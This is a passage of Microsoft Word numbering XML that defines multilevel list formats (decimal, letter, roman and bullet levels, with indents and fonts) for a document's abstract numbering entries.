      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BC0EECDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FD2E8A34">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="58A63B42">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C028591A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C3D67080">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4986050C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0C9678DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE0CFD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ED657A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C77C8DCE"/>
    <w:lvl w:ilvl="0" w:tplc="824047EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C04E1ECC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D58AA884">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8056DF72">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AEF459C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A40E578E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4094CB64">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="37C01AF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="84D441BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0F185050"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0AA45D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10D03F48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E6862E2"/>
    <w:lvl w:ilvl="0" w:tplc="0254B8B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>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DBA29F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8454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DE491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E44DC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0EB44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78194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22DBF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9652F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2BF6A64"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0AA45D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1346221B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="23724FBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7598BE76">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4A10C508">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="55EA497A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="50646B1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C90ECBEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4DDC7364">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="614AED7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B68EE6BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1548152F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="E3BC241A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5358A732">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D37483F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E8F49342">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B0BCB8B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D9AE991E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B71A124C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="616CCF1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="45788DE0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="16A61136"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DE465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76C3141"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0AA45D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17792D5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48C6502A"/>
    <w:lvl w:ilvl="0" w:tplc="80F4AEA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9B9E870A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17BCF00E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="EBB06D5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CB04D564">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D95C263C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5966142C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3A60F9AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C8A0515C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="17BC4198"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2704C66"/>
    <w:lvl w:ilvl="0" w:tplc="5A18A0E8">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C243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10C5D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D2F97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10CB4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5ADBD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50AE4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7624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5EF75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81874FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="88F473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9A27F1A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="C5CE2DCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="30A0D680">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7924FD9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="26B43E08">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="111E26E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="EE22498C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DB1EC806">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="28B64810">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E3E422BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1A560570"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A716A32C">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5260B3FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2874465E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E522D8E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7AFEDD4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E3EC72C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8ED89B38">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2BF021DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C3D09690">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1B472FD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2B8E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B536A07"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="C9C4F576">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4830B520">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1D3CD4EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5AD06388">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DD382F8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9A1CCDB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2C1EF992">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F866E652">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7E4A5234">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1B7350A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="DE7E4618">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="57B2BB74">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FE3C07FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4D8EDA7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="508680FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FAA675DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="95CA00F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B8C00D9A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="420E73FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1D086985"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="AF2E26E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BBBCC228">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="286E79EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="11B808F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2D081C2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0CE654A8">
      <w:start w:val="1"/>
